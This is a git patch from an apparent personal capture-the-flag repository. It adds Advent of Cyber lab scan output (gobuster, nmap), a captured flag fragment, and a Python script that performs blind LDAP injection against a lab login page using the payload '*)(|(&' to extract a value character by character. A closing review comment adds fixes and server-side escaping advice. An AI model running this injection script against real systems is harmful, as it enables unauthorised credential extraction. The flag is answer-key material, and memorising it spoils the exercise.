From 1b6dfea090964ed54c7607f3ee5d57fbe547715c Mon Sep 17 00:00:00 2001
From: Curo
Date: Mon, 8 Dec 2025 17:15:06 +0100
Subject: [PATCH] 2025-12-08
---
AoC/2025/07/gobuster.txt | 3 +
AoC/2025/07/nmap_scan.txt | 104 +++++++++++++++++++++++++++++++++++
AoC/2025/07/tbfc_qa_key1 | 1 +
Walkthroughs/LDAPi/script.py | 47 ++++++++++++++++
4 files changed, 155 insertions(+)
create mode 100644 AoC/2025/07/gobuster.txt
create mode 100644 AoC/2025/07/nmap_scan.txt
create mode 100644 AoC/2025/07/tbfc_qa_key1
create mode 100644 Walkthroughs/LDAPi/script.py
diff --git a/AoC/2025/07/gobuster.txt b/AoC/2025/07/gobuster.txt
new file mode 100644
index 0000000..f589385
--- /dev/null
+++ b/AoC/2025/07/gobuster.txt
@@ -0,0 +1,3 @@
+/terminal  (Status: 302) [Size: 201] [--> /unlock]
+/unlock  (Status: 200) [Size: 1257]
+/tty  (Status: 301) [Size: 162] [--> http://10.82.133.11/tty/]
diff --git a/AoC/2025/07/nmap_scan.txt b/AoC/2025/07/nmap_scan.txt
new file mode 100644
index 0000000..a96538c
--- /dev/null
+++ b/AoC/2025/07/nmap_scan.txt
@@ -0,0 +1,104 @@ +# Nmap 7.95 scan initiated Mon Dec 8 07:47:46 2025 as: /usr/lib/nmap/nmap --privileged -A -T4 -p- -oN nmap_scan.txt 10.82.133.11 +Nmap scan report for 10.82.133.11 +Host is up (0.042s latency). +Not shown: 65531 filtered tcp ports (no-response) +PORT STATE SERVICE VERSION +22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.14 (Ubuntu Linux; protocol 2.0) +80/tcp open http nginx +|_http-title: TBFC QA \xE2\x80\x94 EAST-mas +21212/tcp open ftp vsftpd 3.0.5 +| ftp-syst: +| STAT: +| FTP server status: +| Connected to 192.168.156.241 +| Logged in as ftp +| TYPE: ASCII +| No session bandwidth limit +| Session timeout in seconds is 300 +| Control connection is plain text +| Data connections will be plain text +| At session startup, client count was 3 +| vsFTPd 3.0.5 - secure, fast, stable +|_End of status +| ftp-anon: Anonymous FTP login allowed (FTP code 230) +|_Can't get directory listing: TIMEOUT +25251/tcp open unknown +| fingerprint-strings: +| DNSStatusRequestTCP, DNSVersionBindReqTCP, LDAPBindReq, NULL, RPCCheck, SMBProgNeg, X11Probe: +| TBFC maintd v0.2 +| Type HELP for commands. +| FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, LDAPSearchReq, RTSPRequest: +| TBFC maintd v0.2 +| Type HELP for commands. +| unknown command +| unknown command +| Help: +| TBFC maintd v0.2 +| Type HELP for commands. +| Commands: HELP, STATUS, GET KEY, QUIT +| Kerberos, LPDString, SSLSessionReq, TLSSessionReq, TerminalServerCookie: +| TBFC maintd v0.2 +| Type HELP for commands. +| unknown command +| SIPOptions: +| TBFC maintd v0.2 +| Type HELP for commands. +| unknown command +| unknown command +| unknown command +| unknown command +| unknown command +| unknown command +| unknown command +| unknown command +| unknown command +| unknown command +|_ unknown command +1 service unrecognized despite returning data. 
If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : +SF-Port25251-TCP:V=7.95%I=7%D=12/8%Time=693674F2%P=aarch64-unknown-linux-g +SF:nu%r(NULL,29,"TBFC\x20maintd\x20v0\.2\nType\x20HELP\x20for\x20commands\ +SF:.\n")%r(GenericLines,49,"TBFC\x20maintd\x20v0\.2\nType\x20HELP\x20for\x +SF:20commands\.\nunknown\x20command\nunknown\x20command\n")%r(GetRequest,4 +SF:9,"TBFC\x20maintd\x20v0\.2\nType\x20HELP\x20for\x20commands\.\nunknown\ +SF:x20command\nunknown\x20command\n")%r(HTTPOptions,49,"TBFC\x20maintd\x20 +SF:v0\.2\nType\x20HELP\x20for\x20commands\.\nunknown\x20command\nunknown\x +SF:20command\n")%r(RTSPRequest,49,"TBFC\x20maintd\x20v0\.2\nType\x20HELP\x +SF:20for\x20commands\.\nunknown\x20command\nunknown\x20command\n")%r(RPCCh +SF:eck,29,"TBFC\x20maintd\x20v0\.2\nType\x20HELP\x20for\x20commands\.\n")% +SF:r(DNSVersionBindReqTCP,29,"TBFC\x20maintd\x20v0\.2\nType\x20HELP\x20for +SF:\x20commands\.\n")%r(DNSStatusRequestTCP,29,"TBFC\x20maintd\x20v0\.2\nT +SF:ype\x20HELP\x20for\x20commands\.\n")%r(Help,4F,"TBFC\x20maintd\x20v0\.2 +SF:\nType\x20HELP\x20for\x20commands\.\nCommands:\x20HELP,\x20STATUS,\x20G +SF:ET\x20KEY,\x20QUIT\n")%r(SSLSessionReq,39,"TBFC\x20maintd\x20v0\.2\nTyp +SF:e\x20HELP\x20for\x20commands\.\nunknown\x20command\n")%r(TerminalServer +SF:Cookie,39,"TBFC\x20maintd\x20v0\.2\nType\x20HELP\x20for\x20commands\.\n +SF:unknown\x20command\n")%r(TLSSessionReq,39,"TBFC\x20maintd\x20v0\.2\nTyp +SF:e\x20HELP\x20for\x20commands\.\nunknown\x20command\n")%r(Kerberos,39,"T +SF:BFC\x20maintd\x20v0\.2\nType\x20HELP\x20for\x20commands\.\nunknown\x20c +SF:ommand\n")%r(SMBProgNeg,29,"TBFC\x20maintd\x20v0\.2\nType\x20HELP\x20fo +SF:r\x20commands\.\n")%r(X11Probe,29,"TBFC\x20maintd\x20v0\.2\nType\x20HEL +SF:P\x20for\x20commands\.\n")%r(FourOhFourRequest,49,"TBFC\x20maintd\x20v0 +SF:\.2\nType\x20HELP\x20for\x20commands\.\nunknown\x20command\nunknown\x20 
+SF:command\n")%r(LPDString,39,"TBFC\x20maintd\x20v0\.2\nType\x20HELP\x20fo +SF:r\x20commands\.\nunknown\x20command\n")%r(LDAPSearchReq,49,"TBFC\x20mai +SF:ntd\x20v0\.2\nType\x20HELP\x20for\x20commands\.\nunknown\x20command\nun +SF:known\x20command\n")%r(LDAPBindReq,29,"TBFC\x20maintd\x20v0\.2\nType\x2 +SF:0HELP\x20for\x20commands\.\n")%r(SIPOptions,D9,"TBFC\x20maintd\x20v0\.2 +SF:\nType\x20HELP\x20for\x20commands\.\nunknown\x20command\nunknown\x20com +SF:mand\nunknown\x20command\nunknown\x20command\nunknown\x20command\nunkno +SF:wn\x20command\nunknown\x20command\nunknown\x20command\nunknown\x20comma +SF:nd\nunknown\x20command\nunknown\x20command\n"); +Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port +Aggressive OS guesses: Linux 5.18 (96%), Linux 5.4 (94%), Cisco Unified Communications Manager VoIP adapter (92%), Linux 2.6.26 (92%), Linux 2.6.18 (89%), Android TV OS 11 (Linux 4.19) (88%), Android 7.1.2 (Linux 3.10) (88%), IPFire 2.25 firewall (Linux 4.14) (88%), IPFire 2.27 (Linux 5.15 - 6.1) (88%), Linux 2.6.32 (88%) +No exact OS matches for host (test conditions non-ideal). +Network Distance: 3 hops +Service Info: OSs: Linux, Unix; CPE: cpe:/o:linux:linux_kernel + +TRACEROUTE (using port 80/tcp) +HOP RTT ADDRESS +1 42.07 ms 192.168.128.1 +2 ... +3 42.69 ms 10.82.133.11 + +OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +# Nmap done at Mon Dec 8 07:52:34 2025 -- 1 IP address (1 host up) scanned in 288.40 seconds diff --git a/AoC/2025/07/tbfc_qa_key1 b/AoC/2025/07/tbfc_qa_key1 new file mode 100644 index 0000000..36a2b10 --- /dev/null +++ b/AoC/2025/07/tbfc_qa_key1 @@ -0,0 +1 @@ +KEY1:3aster_ diff --git a/Walkthroughs/LDAPi/script.py b/Walkthroughs/LDAPi/script.py new file mode 100644 index 0000000..98f257b --- /dev/null +++ b/Walkthroughs/LDAPi/script.py 
@@ -0,0 +1,47 @@
+import requests
+from bs4 import BeautifulSoup
+import string
+import time
+
+# Base URL
+url = 'http://10.82.144.176/blind.php'
+
+# Define the character set
+char_set = string.ascii_lowercase + string.ascii_uppercase + string.digits + "._!@#$%^&*()"
+
+# Initialize variables
+successful_response_found = True
+successful_chars = ''
+
+headers = {
+ 'Content-Type': 'application/x-www-form-urlencoded'
+}
+
+while successful_response_found:
+ successful_response_found = False
+
+ for char in char_set:
+ #print(f"Trying password character: {char}")
+
+ # Adjust data to target the password field
+ data = {'username': f'{successful_chars}{char}*)(|(&','password': 'pwd)'}
+
+ # Send POST request with headers
+ response = requests.post(url, data=data, headers=headers)
+
+ # Parse HTML content
+ soup = BeautifulSoup(response.content, 'html.parser')
+
+ # Adjust success criteria as needed
+ paragraphs = soup.find_all('p', style='color: green;')
+
+ if paragraphs:
+ successful_response_found = True
+ successful_chars += char
+ print(f"Successful character found: {char}")
+ break
+
+ if not successful_response_found:
+ print("No successful character found in this iteration.")
+
+print(f"Final successful payload: {successful_chars}")
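Review bot: The `requests.post(url, data=data, headers=headers)` call inside the `for char in char_set` loop has no timeout and its status is never checked, so a stalled lab host blocks the run indefinitely and an error page is indistinguishable from a "no match" answer. I would change it to `response = requests.post(url, data=data, headers=headers, timeout=10)` followed by `response.raise_for_status()`. The comment `# Adjust data to target the password field` disagrees with the code, which varies `username` and keeps `password` fixed, and `import time` is never used. For readers of the walkthrough, a header comment should state the root cause: the green-paragraph oracle appears to exist only because `blind.php` places form input into the LDAP filter unescaped, so escaping filter metacharacters on the server (RFC 4515) removes it. The run should also stand out in web logs as a burst of sequential POSTs whose `username` contains `*)(|(&`.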